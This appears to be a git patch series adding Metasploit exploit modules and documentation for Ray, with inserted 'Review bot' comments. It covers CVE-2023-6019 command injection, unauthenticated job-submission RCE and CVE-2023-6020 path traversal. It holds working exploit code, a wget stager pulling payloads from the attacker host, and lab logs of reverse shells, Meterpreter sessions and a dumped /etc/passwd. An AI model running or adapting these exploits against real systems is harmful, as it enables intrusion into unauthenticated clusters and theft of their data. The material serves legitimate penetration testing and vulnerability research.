index 0000000000..f06e762fd5
--- /dev/null
+++ b/modules/exploits/linux/http/ray_agent_job_rce.rb
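Review bot: `run` only prints the retrieved file although the module includes `Msf::Auxiliary::Report`; the content should also be persisted so it survives the console session, e.g. `path = store_loot('ray.lfi', 'text/plain', rhost, @file_content, datastore['FILEPATH'])` followed by `print_good("File saved to #{path}")`. The description states `Ray before 2.8.1` while the documentation added later in this series and the earlier "Correct vulnerable version <=v2.6.3" commit give `<=v2.6.3`; one of the two ranges is presumably wrong and the module and its doc should agree. `check` performs the real file read, which is what justifies `Vulnerable`, so a short comment on `check` such as `# Reads FILEPATH from the target; a 200 with a body is the proof of vulnerability` would make that intent explicit.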
@@ -0,0 +1,96 @@
+ ##
+ # This module requires Metasploit: https://metasploit.com/download
+ # Current source: https://github.com/rapid7/metasploit-framework
+ ##
+
+ class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Ray Agent Job RCE',
+ 'Description' => %q{
+ RCE in Ray via the agent job submission endpoint.
+ This is intended functionality as Ray's main purpose is executing arbitrary workloads.
+ By default Ray has no authentication.
+ },
+ 'Author' => [
+ 'sierrabearchell', # Vulnerability discovery
+ 'byt3bl33d3r ', # Python Metasploit module
+ 'Takahiro Yokoyama' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'],
+ ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/']
+ ],
+ 'CmdStagerFlavor' => %i[wget],
+ 'Payload' => {
+ 'DisableNops' => true
+ },
+ 'Platform' => %w[linux],
+ 'Targets' => [
+ [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],
+ [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
+ [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '2023-11-15',
+ 'Notes' => {
+ 'Stability' => [ CRASH_SAFE, ],
+ 'SideEffects' => [],
+ 'Reliability' => [ REPEATABLE_SESSION, ]
+ }
+ )
+ )
+
+ register_options(
+ [
+ Opt::RPORT(8265),
+ OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]),
+ ]
+ )
+ end
+
+ def get_job_data(cmd)
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'api/jobs/'),
+ 'data' => { 'entrypoint' => cmd }.to_json
+ })
+ unless res && res.code == 200
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'),
+ 'data' => { 'entrypoint' => cmd }.to_json
+ })
+ end
+ return unless res && res.code == 200
+
+ JSON.parse(res.body)
+ end
+
+ def check
+ @job_data = get_job_data(datastore['COMMAND'])
+ return Exploit::CheckCode::Safe if @job_data.nil?
+
+ Exploit::CheckCode::Detected
+ end
+
+ def exploit
+ @job_data ||= get_job_data(datastore['COMMAND'])
+ print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'")
+ execute_cmdstager({ flavor: :wget })
+ end
+
+ def execute_command(cmd, _opts = {})
+ get_job_data(cmd)
+ end
+
+ end
diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb
new file mode 100644
index 0000000000..0dafcf6bfa
--- /dev/null
+++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb
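Review bot: `check` submits a job whose entrypoint is `datastore['COMMAND']`, so it is an intrusive check rather than a passive probe, yet `'Notes'` declares `'SideEffects' => []`; the submitted job and the wget stage both leave traces, so `'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]` is the accurate declaration and `check` deserves a comment such as `# Intrusive: submits a real job running COMMAND to prove the endpoint is open`. The POST bodies in `get_job_data` are JSON but no `ctype` is given, so the request carries the HttpClient default content type; it evidently worked in testing, but `'ctype' => 'application/json'` would make the request self-describing. When the first endpoint fails, its response is silently replaced by the fallback request, so a non-200 from `api/jobs/` never appears in verbose output; a `vprint_status` on that branch would help triage failures.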
@@ -0,0 +1,103 @@
+ ##
+ # This module requires Metasploit: https://metasploit.com/download
+ # Current source: https://github.com/rapid7/metasploit-framework
+ ##
+
+ class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Ray cpu_profile command injection',
+ 'Description' => %q{
+ Ray RCE via cpu_profile command injection vulnerability.
+ },
+ 'Author' => [
+ 'sierrabearchell', # Vulnerability discovery
+ 'byt3bl33d3r ', # Python Metasploit module
+ 'Takahiro Yokoyama' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['CVE', '2023-6019'],
+ ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'],
+ ],
+ 'CmdStagerFlavor' => %i[wget],
+ 'Payload' => {
+ 'DisableNops' => true
+ },
+ 'Platform' => %w[linux],
+ 'Targets' => [
+ [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],
+ [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
+ [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '2023-11-15',
+ 'Notes' => {
+ 'Stability' => [ CRASH_SAFE, ],
+ 'SideEffects' => [],
+ 'Reliability' => [ REPEATABLE_SESSION, ]
+ }
+ )
+ )
+
+ register_options(
+ [
+ Opt::RPORT(8265),
+ ]
+ )
+ end
+
+ def get_nodes
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'nodes?view=summary')
+ })
+ return unless res && res.code == 200
+
+ JSON.parse(res.body)
+ end
+
+ def check
+ @nodes = get_nodes
+ return Exploit::CheckCode::Safe if @nodes.nil?
+
+ Exploit::CheckCode::Detected
+ end
+
+ def exploit
+ # We need to pass valid node info to /worker/cpu_profile for the server to process the request
+ # First we list all nodes and grab the pid and ip of the first one (could be any)
+ @nodes ||= get_nodes
+ fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes
+ first_node = @nodes['data']['summary'].first
+ fail_with(Failure::Unknown, 'Failed to get pid') unless first_node.key?('agent') && first_node['agent'].key?('pid')
+ pid = first_node['agent']['pid']
+ fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip')
+ ip = first_node['ip']
+ print_good("Grabbed node info, pid: #{pid}, ip: #{ip}")
+ execute_cmdstager({ flavor: :wget, pid: pid, ip: ip })
+ end
+
+ def execute_command(cmd, opts = {})
+ send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'),
+ 'vars_get' => {
+ 'pid' => opts[:pid],
+ 'ip' => opts[:ip],
+ 'duration' => 5,
+ 'native' => 0,
+ 'format' => "`#{cmd}`"
+ }
+ })
+ end
+
+ end
From 2363f8416cedb4ba8fe1e0efc1dd28a55c28b850 Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Fri, 9 Aug 2024 12:57:01 +0900
Subject: [PATCH 21/42] Fix Reliability

---
 modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb
index 3ce723ef65..ebf5c915b1 100644
--- a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb
+++ b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb
@@ -30,8 +30,8 @@ class MetasploitModule < Msf::Auxiliary
 'DisclosureDate' => '2023-11-15',
 'Notes' => {
 'Stability' => [ CRASH_SAFE, ],
- 'SideEffects' => [],
- 'Reliability' => [ IOC_IN_LOGS, ]
+ 'SideEffects' => [ IOC_IN_LOGS, ],
+ 'Reliability' => []
 }
 )
 )
From cf15124cc8df323d6fadd42573ab5ca488103e69 Mon Sep 17 00:00:00 2001
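Review bot: `exploit` dereferences `@nodes['data']['summary'].first` and then calls `first_node.key?`, so a 200 reply whose JSON lacks `data`/`summary`, or whose summary is empty, raises `NoMethodError` instead of a clean `fail_with`; the surrounding `fail_with` guards only cover the nil-`@nodes` case. Replace the lookup with `first_node = @nodes.dig('data', 'summary')&.first` and add `fail_with(Failure::UnexpectedReply, 'No node summary in response') unless first_node.is_a?(Hash)` ahead of the pid/ip checks. `check` returns `Detected` from the node listing alone, which is honest, but a comment such as `# Only proves the dashboard API answers; no version or injection test is made here` would stop readers from expecting more from the AutoCheck result.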
From: Takah1ro Date: Fri, 9 Aug 2024 15:34:14 +0900 Subject: [PATCH 22/42] Add not null check --- modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb | 2 +- modules/exploits/linux/http/ray_agent_job_rce.rb | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb index ebf5c915b1..e50dd4898b 100644 --- a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb +++ b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb @@ -52,7 +52,6 @@ class MetasploitModule < Msf::Auxiliary end def lfi - fail_with(Failure::Unknown, 'FILEPATH required when ATTACK is LFI') unless datastore['FILEPATH'] res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") @@ -64,6 +63,7 @@ class MetasploitModule < Msf::Auxiliary def run @file_content ||= lfi + fail_with(Failure::Unknown, 'Failed to execute LFI') unless @file_content print_good("#{datastore['FILEPATH']}\n#{@file_content}") end diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index f06e762fd5..96534522fb 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -85,6 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit @job_data ||= get_job_data(datastore['COMMAND']) + fail_with(Failure::Unknown, 'Failed to get job_data') unless @job_data print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") execute_cmdstager({ flavor: :wget }) end From 0ffe335660f91b0892c7513d833a26bab0f60519 Mon Sep 17 00:00:00 2001 
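Review bot: Both new `fail_with` calls use `Failure::Unknown`, which gives the operator no hint about the cause in the failure summary; the cases they guard are a request that returned nothing usable, for which `Failure::UnexpectedReply` is the class the framework reports meaningfully, e.g. `fail_with(Failure::UnexpectedReply, 'Failed to get job_data') unless @job_data` in the `ray_agent_job_rce.rb` hunk. The same applies to `'Failed to execute LFI'` in `run` of the auxiliary module in the second hunk. The enclosing `exploit` and `run` methods end inside their hunks, so no further callers are affected.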
From: Takah1ro Date: Sat, 10 Aug 2024 10:59:00 +0900 Subject: [PATCH 23/42] Add module docs --- .../auxiliary/gather/ray_lfi_cve_2023_6020.md | 76 +++++++++++++ .../exploit/linux/http/ray_agent_job_rce.md | 106 ++++++++++++++++++ ...cpu_profile_cmd_injection_cve_2023_6019.md | 103 +++++++++++++++++ 3 files changed, 285 insertions(+) create mode 100644 documentation/modules/auxiliary/gather/ray_lfi_cve_2023_6020.md create mode 100644 documentation/modules/exploit/linux/http/ray_agent_job_rce.md create mode 100644 documentation/modules/exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.md diff --git a/documentation/modules/auxiliary/gather/ray_lfi_cve_2023_6020.md b/documentation/modules/auxiliary/gather/ray_lfi_cve_2023_6020.md new file mode 100644 index 0000000000..ce6add271b --- /dev/null +++ b/documentation/modules/auxiliary/gather/ray_lfi_cve_2023_6020.md 
@@ -0,0 +1,76 @@ +## Vulnerable Application + +Ray (<=v2.6.3) is vulnerable to local file inclusion (CVE-2023-6020) + +The vulnerability affects: + + * Ray (<=v2.6.3) + +This module was successfully tested on: + + * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 + +### Install and run the vulnerable Ray (v2.6.3) + +1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform. +2. Install Kali Linux (or other Linux distro) in your virtualization engine. +3. Pull pre-built Ray docker container (v2.6.3) in your VM. + `docker pull rayproject/ray:2.6.3` +4. Start the ray container. + `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3` +5. Start ray. + `ray start --head --dashboard-host=0.0.0.0` + +## Verification Steps + +1. Install the application +2. Start msfconsole +3. Do: `use auxiliary/gather/ray_lfi_cve_2023_6020` +4. Do: `set rhost ` +5. Do: `run` +6. You should get a file content + +## Options + +### FILEPATH (Required) + +This is the file to read. Default is `/etc/passwd`. + +## Scenarios + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 +``` +msf6 > use auxiliary/gather/ray_lfi_cve_2023_6020 +msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > check +[+] 192.168.56.6:8265 - The target is vulnerable. +msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > run +[*] Running module against 192.168.56.6 + +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target is vulnerable. 
+[+] /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +_apt:x:100:65534::/nonexistent:/usr/sbin/nologin +ray:x:1000:100::/home/ray:/bin/bash + +[*] Auxiliary module execution completed +``` diff --git a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md new file mode 100644 index 0000000000..880d41aa4e --- /dev/null +++ b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md 
@@ -0,0 +1,106 @@ +## Vulnerable Application + +Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint + +The vulnerability affects: + + * Ray (<=v2.6.3) + +This module was successfully tested on: + + * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 + +### Install and run the vulnerable Ray (v2.6.3) + +1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform. +2. Install Kali Linux (or other Linux distro) in your virtualization engine. +3. Pull pre-built Ray docker container (v2.6.3) in your VM. + `docker pull rayproject/ray:2.6.3` +4. Start the ray container. + `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3` +5. Start ray. + `ray start --head --dashboard-host=0.0.0.0` + +## Verification Steps + +1. Install the application +2. Start msfconsole +3. Do: `use exploit/linux/http/ray_agent_job_rce` +4. Do: `set rhost ` +5. Do: `set lhost ` +6. Do: `run` +7. You should get a shell or meterpreter + +## Options + +### COMMAND (Required) + +This is the command to execute. Default is `echo 'Hello from Metasploit'`. + +## Scenarios + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0) +``` +msf6 > use exploit/linux/http/ray_agent_job_rce +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_agent_job_rce) > check +[*] 192.168.56.6:8265 - The service is running, but could not be validated. +msf6 exploit(linux/http/ray_agent_job_rce) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[!] The service is running, but could not be validated. +[+] Command execution successful. 
Job ID: 'raysubmit_EJDSK2BrhAP8j69n' Submission ID: 'raysubmit_EJDSK2BrhAP8j69n' +[*] Using URL: http://192.168.56.1:8080/kOZWO5HA3wWm2Hh +[*] Command Stager progress - 100.00% done (120/120 bytes) +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /kOZWO5HA3wWm2Hh +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (3045380 bytes) to 192.168.56.6 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:42052) at 2024-08-10 10:45:48 +0900 +[*] Server stopped. + +meterpreter > sysinfo +Computer : 172.17.0.2 +OS : Ubuntu 20.04 (Linux 6.6.15-amd64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +``` + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1) +``` +msf6 > use exploit/linux/http/ray_agent_job_rce +[*] Using configured payload linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_agent_job_rce) > set target 1 +target => 1 +msf6 exploit(linux/http/ray_agent_job_rce) > set payload linux/x86/shell/reverse_tcp +payload => linux/x86/shell/reverse_tcp +msf6 exploit(linux/http/ray_agent_job_rce) > check +[*] 192.168.56.6:8265 - The service is running, but could not be validated. +msf6 exploit(linux/http/ray_agent_job_rce) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[!] The service is running, but could not be validated. +[+] Command execution successful. 
Job ID: 'raysubmit_RNpiJJt2feNrUrwN' Submission ID: 'raysubmit_RNpiJJt2feNrUrwN' +[*] Using URL: http://192.168.56.1:8080/QtpKXmqA8kq +[*] Command Stager progress - 100.00% done (116/116 bytes) +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /QtpKXmqA8kq +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (36 bytes) to 192.168.56.6 +[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:35136) at 2024-08-10 10:47:37 +0900 +[*] Server stopped. + +whoami +ray +pwd +/home/ray +``` diff --git a/documentation/modules/exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.md b/documentation/modules/exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.md new file mode 100644 index 0000000000..0726112fca --- /dev/null +++ b/documentation/modules/exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.md 
@@ -0,0 +1,103 @@ +## Vulnerable Application + +Ray (<=v2.6.3) is vulnerable to RCE via cpu_profile command injection vulnerability (CVE-2023-6019) + +The vulnerability affects: + + * Ray (<=v2.6.3) + +This module was successfully tested on: + + * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 + +### Install and run the vulnerable Ray (v2.6.3) + +1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform. +2. Install Kali Linux (or other Linux distro) in your virtualization engine. +3. Pull pre-built Ray docker container (v2.6.3) in your VM. + `docker pull rayproject/ray:2.6.3` +4. Start the ray container. + `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3` +5. Start ray. + `ray start --head --dashboard-host=0.0.0.0` + +## Verification Steps + +1. Install the application +2. Start msfconsole +3. Do: `use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019` +4. Do: `set rhost ` +5. Do: `set lhost ` +6. Do: `run` +7. You should get a shell or meterpreter + +## Options +No options + +## Scenarios + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0) +``` +msf6 > use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019 +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > check +[*] 192.168.56.6:8265 - The service is running, but could not be validated. +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[!] The service is running, but could not be validated. 
+[+] Grabbed node info, pid: 129, ip: 172.17.0.2 +[*] Using URL: http://192.168.56.1:8080/2W4ZJ30NqjnfoGE +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /2W4ZJ30NqjnfoGE +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (3045380 bytes) to 192.168.56.6 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:59072) at 2024-08-10 10:29:05 +0900 +[*] Command Stager progress - 100.00% done (120/120 bytes) +[*] Server stopped. + +meterpreter > sysinfo +Computer : 172.17.0.2 +OS : Ubuntu 20.04 (Linux 6.6.15-amd64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +``` + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1) +``` +msf6 > use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019 +[*] Using configured payload linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set target 1 +target => 1 +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set payload linux/x86/shell/reverse_tcp +payload => linux/x86/shell/reverse_tcp +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > check +[*] 192.168.56.6:8265 - The service is running, but could not be validated. +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[!] The service is running, but could not be validated. 
+[+] Grabbed node info, pid: 129, ip: 172.17.0.2 +[*] Using URL: http://192.168.56.1:8080/Mz2SC2mlSp +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /Mz2SC2mlSp +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (36 bytes) to 192.168.56.6 +[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:59210) at 2024-08-10 10:30:49 +0900 +[*] Command Stager progress - 100.00% done (115/115 bytes) +[*] Server stopped. + +whoami +ray +pwd +/home/ray +``` From ea1b9e925e109379273eaf0144eb2d3d0af56806 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Thu, 15 Aug 2024 08:17:36 +0900 Subject: [PATCH 24/42] Delete old three exploits in one module --- .../exploit/linux/http/ray_cmdi_rce_lfi.md | 222 ------------------ .../exploits/linux/http/ray_cmdi_rce_lfi.rb | 178 -------------- 2 files changed, 400 deletions(-) delete mode 100644 documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md delete mode 100644 modules/exploits/linux/http/ray_cmdi_rce_lfi.rb diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md deleted file mode 100644 index 846cf9fb44..0000000000 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ /dev/null 
@@ -1,222 +0,0 @@ -## Vulnerable Application - -Ray (<=v2.6.3) is vulnerable to three vulnerabilities: - - * RCE via cpu_profile command injection vulnerability (CVE-2023-6019) - * RCE via the agent job submission endpoint (No CVE) - * local file inclusion (CVE-2023-6020) - -This module exploits all three vulnerabilities. - -The vulnerability affects: - - * Ray (<=v2.6.3) - -This module was successfully tested on: - - * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 - -### Install and run the vulnerable Ray (v2.6.3) - -1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform. -2. Install Kali Linux (or other Linux distro) in your virtualization engine. -3. Pull pre-built Ray docker container (v2.6.3) in your VM. - `docker pull rayproject/ray:2.6.3` -4. Start the ray container. - `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3` -5. Start ray. - `ray start --head --dashboard-host=0.0.0.0` - -## Verification Steps - -1. Install the application -2. Start msfconsole -3. Do: `use exploit/linux/http/ray_cmdi_rce_lfi` -4. Do: `set rhost ` -5. Optional: `set rport ` -6. Do: `set lhost ` -7. Optional: `set ATTACK ` -8. Do: `run` -9. You should get a shell or meterpreter - -## Options - -### ATTACK (required) - -This is the attack type to use. Default is CMDi (`CVE-2023-6019`). but RCE (No CVE) and LFI (`CVE-2023-6020`) can also be chosen. - -### COMMAND (Optional) - -This is the command to execute. Default is `echo 'Hello from Metasploit'`. -This is used when ATTACK is set to `CMDi` or `RCE` and required when ATTACK is `RCE`. - -### FILEPATH (Optional) - -This is the file to read. Default is `/etc/passwd`. This is used and required when ATTACK is set to `LFI`. 
- -## Scenarios - -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CMDi, target 0) -``` -msf6 > use exploit/linux/http/ray_cmdi_rce_lfi -[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 -rhost => 192.168.56.6 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 -lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run - -[*] Started reverse TCP handler on 192.168.56.1:4444 -[*] Running automatic check ("set AutoCheck false" to disable) -[!] The service is running, but could not be validated. -[+] Grabbed node info, pid: 124, ip: 172.17.0.2 -[+] Command execution seems to have been successful. Status code: 500 -[*] Using URL: http://192.168.56.1:8080/gSfnYt3 -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /gSfnYt3 -[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) -[*] Sending stage (3045380 bytes) to 192.168.56.6 -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:40066) at 2024-08-07 21:00:50 +0900 -[*] Command Stager progress - 100.00% done (112/112 bytes) -[*] Server stopped. 
- -meterpreter > sysinfo -Computer : 172.17.0.2 -OS : Ubuntu 20.04 (Linux 6.6.15-amd64) -Architecture : x64 -BuildTuple : x86_64-linux-musl -Meterpreter : x64/linux -meterpreter > -``` - -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CMDi, target 1) -``` -msf6 > use exploit/linux/http/ray_cmdi_rce_lfi -[*] Using configured payload linux/x86/shell/reverse_tcp -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 -rhost => 192.168.56.6 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 -lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 -target => 1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp -payload => linux/x86/shell/reverse_tcp -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run - -[*] Started reverse TCP handler on 192.168.56.1:4444 -[*] Running automatic check ("set AutoCheck false" to disable) -[!] The service is running, but could not be validated. -[+] Grabbed node info, pid: 124, ip: 172.17.0.2 -[+] Command execution seems to have been successful. Status code: 500 -[*] Using URL: http://192.168.56.1:8080/l7pOn5OcI8ed4P -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /l7pOn5OcI8ed4P -[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) -[*] Sending stage (36 bytes) to 192.168.56.6 -[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:34826) at 2024-08-07 21:02:30 +0900 -[*] Command Stager progress - 100.00% done (119/119 bytes) -[*] Server stopped. 
